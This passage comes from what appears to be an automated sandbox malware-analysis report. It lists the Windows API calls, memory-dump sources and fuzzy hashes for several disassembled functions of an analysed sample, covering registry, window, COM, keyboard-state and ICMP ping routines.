                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001307BE
                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001307DA
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00130804
                                                                                                                                                                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0013082C
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00130837
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0013083C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                          • API String ID: 323675364-22481851
                                                                                                                                                                                                                                          • Opcode ID: d7a43fe3de6de368e0cd4871f780dd556c8715ea0e69172f25d813414be945f4
                                                                                                                                                                                                                                          • Instruction ID: 08e0eaf99464d336797e4ec03e18939515a83ec50f261fd3fba1439627b4aaa2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7a43fe3de6de368e0cd4871f780dd556c8715ea0e69172f25d813414be945f4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4411976D10229ABDF11EBA4DC959EDB7B8FF08750F04416AE941B3261EB709E44CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00163F98 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0016403B
                                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00164042
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00164055
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0016405D
                                                                                                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00164068
                                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00164072
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0016407C
                                                                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00164092
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 0016409E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                          • Opcode ID: 77932b3d596011c639ce42c96e442126b465c8b6865db7b3d0fce8af9440364c
                                                                                                                                                                                                                                          • Instruction ID: fdda59684439422a3494dd20202557063dc3a615415d588889ff27360d1aace9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77932b3d596011c639ce42c96e442126b465c8b6865db7b3d0fce8af9440364c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5316E32501215BBDF219FA8DC09FEA3B69FF0D324F110211FA65A61A0C7B5D8A0DBA4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00153C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00153C5C
                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00153C8A
                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00153C94
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00153D2D
                                                                                                                                                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00153DB1
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00153ED5
                                                                                                                                                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00153F0E
                                                                                                                                                                                                                                          • CoGetObject.OLE32(?,00000000,0016FB98,?), ref: 00153F2D
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00153F40
                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00153FC4
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00153FD8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 429561992-0
                                                                                                                                                                                                                                          • Opcode ID: d39a2706c8ad1248549883dce6cf206904eda68db5fe3e8d520327be265ef9ca
                                                                                                                                                                                                                                          • Instruction ID: 3b6561fa97ffa6a97c2e6ae5ef6d3e5b43e8f8477d24930a445c46b8ec79798a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d39a2706c8ad1248549883dce6cf206904eda68db5fe3e8d520327be265ef9ca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CC11371608205DFC700DF68C88496AB7E9FF89785F00491DF9A99B211DB71EE49CB62
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00147A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00147AF3
                                                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00147B8F
                                                                                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00147BA3
                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0016FD08,00000000,00000001,00196E6C,?), ref: 00147BEF
                                                                                                                                                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00147C74
                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 00147CCC
                                                                                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00147D57
                                                                                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00147D7A
                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00147D81
                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00147DD6
                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00147DDC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2762341140-0
                                                                                                                                                                                                                                          • Opcode ID: 6837e95374ef4a2095dd851970b8529882b2cbe4300c6c42dcc68fe570ae4751
                                                                                                                                                                                                                                          • Instruction ID: 92dc91391101ce0b6d4bfb30635e0e28b04198364948787bf9aa8faf40481fdf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6837e95374ef4a2095dd851970b8529882b2cbe4300c6c42dcc68fe570ae4751
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDC11C75A04219AFCB14DFA4C884DAEBBF9FF48304B148499E819DB762DB31ED45CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0016541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00165504
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00165515
                                                                                                                                                                                                                                          • CharNextW.USER32(00000158), ref: 00165544
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00165585
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0016559B
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001655AC
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1350042424-0
                                                                                                                                                                                                                                          • Opcode ID: de3f254771101ea455a65c96800a279278a03c6b248b597197ea494677d9c6ca
                                                                                                                                                                                                                                          • Instruction ID: e808ff3dd74cb0217f048afcd5a22f213127289a6a5873ab3791f06d33373b12
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de3f254771101ea455a65c96800a279278a03c6b248b597197ea494677d9c6ca
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9761AF35900609EFDF108F64CC84DFE7BBAEF09725F108145F965A7290DB748AA0DB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0012FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0012FAAF
                                                                                                                                                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 0012FB08
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0012FB1A
                                                                                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0012FB3A
                                                                                                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0012FB8D
                                                                                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 0012FBA1
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0012FBB6
                                                                                                                                                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 0012FBC3
                                                                                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0012FBCC
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0012FBDE
                                                                                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0012FBE9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2706829360-0
                                                                                                                                                                                                                                          • Opcode ID: b78b04029da89fb664a5386f677552226e478ed91536799f9dc4c649338e8bc2
                                                                                                                                                                                                                                          • Instruction ID: fcf7ccefb8af18f6ccaea271b8786edb2f73124c219b83323907f9b252e7bf9b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b78b04029da89fb664a5386f677552226e478ed91536799f9dc4c649338e8bc2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2415F35A002299FCB04DF64DC589FEBBB9EF08344F008079E945A7661CB70E956CFA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00139C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 00139CA1
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00139D22
                                                                                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 00139D3D
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00139D57
                                                                                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 00139D6C
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00139D84
                                                                                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 00139D96
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00139DAE
                                                                                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 00139DC0
                                                                                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00139DD8
                                                                                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 00139DEA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                                                                                          • Opcode ID: e20338ecd4fa37cc1bf24aeb37082b6c93e55b2de59d0699676e0278765f6001
                                                                                                                                                                                                                                          • Instruction ID: 06b3979a1c0fadfd17516127c8123c2853efb4c493d674e27ca19b7df7bed3b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e20338ecd4fa37cc1bf24aeb37082b6c93e55b2de59d0699676e0278765f6001
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B541C8346047CA6DFF3197A5C8053B6FEA06F11344F04805ADAC75A6C2DBE59DC8CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 001505BC
                                                                                                                                                                                                                                          • inet_addr.WSOCK32(?), ref: 0015061C
                                                                                                                                                                                                                                          • gethostbyname.WSOCK32(?), ref: 00150628
                                                                                                                                                                                                                                          • IcmpCreateFile.IPHLPAPI ref: 00150636
                                                                                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001506C6
                                                                                                                                                                                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001506E5
                                                                                                                                                                                                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 001507B9
                                                                                                                                                                                                                                          • WSACleanup.WSOCK32 ref: 001507BF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                          • String ID: Ping
                                                                                                                                                                                                                                          • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                          • Opcode ID: f7afa2527b96da69ee0eea1fdb3acc021897c31b639fffad1cafcbe827276e72
                                                                                                                                                                                                                                          • Instruction ID: 738a43b897c235c848fefb7f8eab1509d145a716487d4cf6fe7de988dfe6b1aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7afa2527b96da69ee0eea1fdb3acc021897c31b639fffad1cafcbe827276e72
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7591AD35604201DFD321CF55C888F1ABBE0AF48318F1585A9E8A99F7A2D770ED49CF91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00158CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                          • API String ID: 707087890-567219261
                                                                                                                                                                                                                                          • Opcode ID: 6713ee605eb6a64a5e1cd652e87897a50358dc068a4b979ad620718c7fdd563d
                                                                                                                                                                                                                                          • Instruction ID: 377ed79006e3b9f24ace32fdbf3db322aa0f32752abab832c75a89ff891f349a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6713ee605eb6a64a5e1cd652e87897a50358dc068a4b979ad620718c7fdd563d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3751AE31A04116DBCF14DFA8C9418BEB3B5EF65725B214229E866FB2C5DB31DE44C790
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CoInitialize.OLE32 ref: 00153774
                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 0015377F
                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,0016FB78,?), ref: 001537D9
                                                                                                                                                                                                                                          • IIDFromString.OLE32(?,?), ref: 0015384C
                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 001538E4
                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00153936
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                          • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                          • Opcode ID: e52d4c838a4476a0fd68c70da613b668e9eb8e184c28a218afad46808aa55620
                                                                                                                                                                                                                                          • Instruction ID: 4c0f894a993d2e78b65f05325ad4afddf562dea383072c816767a3fe26f1af9f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e52d4c838a4476a0fd68c70da613b668e9eb8e184c28a218afad46808aa55620
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F61A170608301EFD315DF64C849B6ABBE8EF48755F10090EF9A59B291D770EE48CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00148195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 00148257
                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00148267
                                                                                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00148273
                                                                                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00148310
